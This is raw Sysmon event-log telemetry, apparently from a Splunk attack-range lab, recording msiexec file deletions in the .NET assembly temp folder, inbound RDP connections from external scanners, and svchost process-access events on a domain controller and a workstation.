14:56:14.804{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com53171-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049989Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:14.661{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55505-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049988Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:17.001{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3536FC5CA2B67A8B29E62636E7D1E08A,SHA256=97DCA0D41B44ED756C619B7AFD97AB3F9ABC289E6F49D8FC70501632FC539625,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.953{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\C76HWU6JFT\System.Configuration.ni.dll.auxMD5=0726536434B1F4CFF6E32E5A04A405E4,SHA256=CA81014EA85BB7A87C6D421D4492658D1ED3693C5E81E194FC9A55A56916500D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.953{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\C76HWU6JFT\System.Configuration.ni.dllMD5=7847E113AF6ED71691FA241B2F092C61,SHA256=B54E3F593F0379C5B679C200EA5BEF842BD6B69EC88E49F89297CAA66E04E7A6,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.938{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\C4N70GKTFI\System.Configuration.Install.ni.dll.auxMD5=20FF2F0A0D70F5CFEFDC3CAE5854BFC7,SHA256=03A72C9FDF9596376C7B0E4584A822D01BC8F7EF5AE4C8E5748E79665383DB7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.938{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\C4N70GKTFI\System.Configuration.Install.ni.dllMD5=BA7270337571525AA0F643C2A10B5BF6,SHA256=E8419C27066C1F18E6B97F3E082D170E3F05683D625CD191F4CF3AEF691D5852,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.938{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\C2HK51K4M7\System.Management.ni.dll.auxMD5=616FFBD02D10F157448EFABE441FF022,SHA256=4BE5225D3C62FBF39F40FCB7DD918B1385D4F9F241EDE312FA7ED87385911F15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.938{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\C2HK51K4M7\System.Management.ni.dllMD5=2EE900B41105DC12B81C9BB8227A3F93,SHA256=95D205DF219148F9871702FCA45AF8400CD3C370ECF4834726698B58938E8187,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000072815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:17.112{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com53312-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000072814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.875{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\C0TCGUWA79\System.DirectoryServices.ni.dll.auxMD5=2BEEB7989E153026455A91546700FDA5,SHA256=63A95441B52371EEE7EAE9605B312F82B498BC927E85C516C19984D5B629AE97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.875{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\C0TCGUWA79\System.DirectoryServices.ni.dllMD5=04A28498B7718E00A2FAA9797FCE2F17,SHA256=47C6A18965FDCE1FA4609406A47B48F689D0B3828CCBF3A73A70B55A3AEB04D1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.860{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\BXY70745SW\System.Numerics.ni.dll.auxMD5=6D550B69BDC7D89EC2E3554A3DDB4667,SHA256=7CF8E63A66C6685A48A43466D8842DE966699265AF5DDA14CF5EE7EA2398B019,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.860{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\BXY70745SW\System.Numerics.ni.dllMD5=AF5901179DD8427F1BCE805FC1C60542,SHA256=976A8BC3D65758BF022E26BC0F8BEC1B908D58665A99B6DB45FD5004809E16C5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.813{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\BWHTE99QJC\System.Windows.Forms.ni.dll.auxMD5=0057D8C02F52278E2D88E0C434C9FB67,SHA256=C3E4ED40898F69A430845210C1C1F6F46FB3382B871EC2264963243B4CEA8BE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.813{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\BWHTE99QJC\System.Windows.Forms.ni.dllMD5=309216E457DECA1FDDFB036BF6ABA05F,SHA256=59A0802383424FB2D07728867DA0A79D6657E2380406D998BCF2630A7966AE38,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.453{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\BVEF6A5NPX\System.Configuration.ni.dll.auxMD5=3748821F7E7DB1DD92C4C5575D6B6964,SHA256=9B707027DB2E45E9A550952164290F845AABB230B7E79A8231FA735944A87FA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.453{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\BVEF6A5NPX\System.Configuration.ni.dllMD5=AAE590481F01707BA3682F70184D1048,SHA256=B012C15153EB2B47FE2EFD7D13B689E342ED5DDD9D9EE55E59FC68D927193736,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.438{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\BVCGLHZC07\System.Xml.ni.dll.auxMD5=9E8273197F9A02B9A721032C9C46FE6C,SHA256=AC968645F5D30BF892E8CD366F36A8DF8B40B65FD7940D3F24C1EEDCE414AEDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.438{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\BVCGLHZC07\System.Xml.ni.dllMD5=5323B8A12366F102A9AFAFEE81B107AB,SHA256=5EACFEB8E0B0C4F166DBFF9B5116A4A371C6652F451A310F30133D1D8680CEE0,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.422{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE793075CBB4AB9E6897364F673A648E,SHA256=49D74179A70C64366E0CCFB3229A628D69E50AB6DECAF34AEA31B64F351A9FFD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000072803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.297{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.297{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.297{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.297{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.297{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000072798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.219{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\BUKVN9YJPN\PresentationFramework.ni.dll.auxMD5=6B885B68C6B0ECCBB2E89A4D73DF63C3,SHA256=D6BB1EE81B79CB0C8DD4C8B39704859B055B9C056478043C924D695876543007,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:18.219{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\BUKVN9YJPN\PresentationFramework.ni.dllMD5=E5E779E851434195EAF586B414E1AB14,SHA256=453BD0B221BFBE7C7C19FD48797DC174A231A8489E5E2A60C82D72F6637CB1BC,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049993Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:18.923{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08CE977EAD4C9F17DFC68B9F6FE0E907,SHA256=5387015547A1E684D05C34C4CC7B41F9424E9179DFDB522ADB547A1FE0DC9D4B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049992Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:16.455{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59938-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000072836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:19.922{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\D8R9OZT8IA\System.Xml.ni.dll.auxMD5=D139F7C46452B340FA1AAB6824F0ADAA,SHA256=D890E796CBA8EDC709F63D916746F2F00C90562CDCC1E36D8310CC15CF0C63B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:19.906{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\D8R9OZT8IA\System.Xml.ni.dllMD5=1D4B0B23D6D67D7249959F4C1C9BE816,SHA256=5FE8862C6007516E2BD43E2801E1BDB58B91ED8E29D744F6B37363C313FA747F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:19.719{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\D2S9RPSSNJ\Microsoft.CSharp.ni.dll.auxMD5=F6FB7708778B24569079915A980A250B,SHA256=BB455BE0C6696DEAC54DFBFD3F9A2EB92EC6BB926F83B3BF861306D6CF64F6B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:19.719{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\D2S9RPSSNJ\Microsoft.CSharp.ni.dllMD5=48AA9752C04C314A19620753925A436D,SHA256=F212554A016D8C679B6A819D79BE0D9292A6A8A63141E4C84F69F50CEBA6174B,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:19.672{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\COJRNMA6KY\System.ServiceProcess.ni.dll.auxMD5=3BE355F7C741659AC9143FE240563390,SHA256=53584243F91BEFFE8C60395404133B9E0965D4BAA27412A3CB14C43C99ADE994,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:19.672{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\COJRNMA6KY\System.ServiceProcess.ni.dllMD5=E7DDC2DB27A745FD9B904E90978E7F57,SHA256=A598609D6B4C0BE721FD06140AF13828706CC526845C19CCA7B50B3F7C6F8AB6,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:19.625{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\CENXN2KILP\System.DirectoryServices.ni.dll.auxMD5=91B2F2790B225E9B80B1642A87D19DA5,SHA256=F23B64863222A016CF4439EEDC90057CFEC21BC75A0D7D8118CE8996F42E8B98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:19.625{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\CENXN2KILP\System.DirectoryServices.ni.dllMD5=EB699F153BF3322C608FA8EC593641AC,SHA256=C88E1D58C19711E2951ACAD7EFB6D6F420D52D13C93B77B4E80B36396EB5AF10,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:19.578{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\CB35XAA0GR\System.Configuration.ni.dll.auxMD5=CDBF47C48FE3C43FA6FDFFC27E7BF502,SHA256=97E156C1F3781604ACACB6E3BCEE094F94B0322FAE5CBE336C46763CCCAB3459,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:19.578{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\CB35XAA0GR\System.Configuration.ni.dllMD5=D3E5AF2CE2FD8C43D74F414B7A63E66F,SHA256=5A239C00CEE27D28EB600819739E67F051F8D96AA44094DB453034062461A935,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:19.531{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\C9VNGI8112\PresentationFramework.ni.dll.auxMD5=E52B8B92200A182613A6D465C8002B70,SHA256=F474210BE1FEE708AE79D9263C73FF92C511B644F04430988D9A0E430AE6491B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:19.531{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\C9VNGI8112\PresentationFramework.ni.dllMD5=9C68AC0EBB9EBD1A36DDB3459C2AEF6A,SHA256=E3858BC89A5E129F3661AE6CCEF8F10A4BBD6A83A2AD2E623AEBA49413795171,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:19.438{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=B06194EC54253A67E8EEBC4682EBC4F0,SHA256=D7EC5BE0D9CD4514F8710ED97613883DCE36F4D7AE5C6966449C99C510FA05FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:19.031{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\C7PHD2QTO0\System.Web.Extensions.ni.dll.auxMD5=3387DD5DFBE5A69E658A1287F3C08628,SHA256=EB1B324EF21E4D9A1DADA4D9A4F519C76D1C862CA16E11725BA97420CFDF6D18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:19.031{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\C7PHD2QTO0\System.Web.Extensions.ni.dllMD5=C11869C1D2B9720BECE21325C4F88BED,SHA256=01E2262DC5D082948478B80C22833216555622B5D23040996F3A9A5AE4E956BC,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049996Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:19.939{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7D18D632E3AA7A40540770080CCBF0E,SHA256=8D2F26537FCD8013ACAE532EE6B3596DEC616376796C20DCFA60DC0B5D88D963,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049995Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:16.765{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52509-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000049994Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:19.610{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=641422E00D7E3963141E441F86BA7CD9,SHA256=937C10C917D0B1A3A71F06DFD0EAE02C75D6B31E3D9D417AA646BE35446E390F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000072856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:19.731{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-26040-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000072855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.672{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EEXH79HD8Y\System.Core.ni.dll.auxMD5=9D25DB6F29813D2D1FA827D77A12D1BD,SHA256=829105ADBF1A5F782DF9E98B29CD106AE1D27988D05B162A5702069C31282417,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.672{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EEXH79HD8Y\System.Core.ni.dllMD5=2FF381DDFCDD26492D228199E5348106,SHA256=381EBF60EC44E82FE34BAC17A1856C95E766E9260604747F71547133C1C550C2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.500{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT 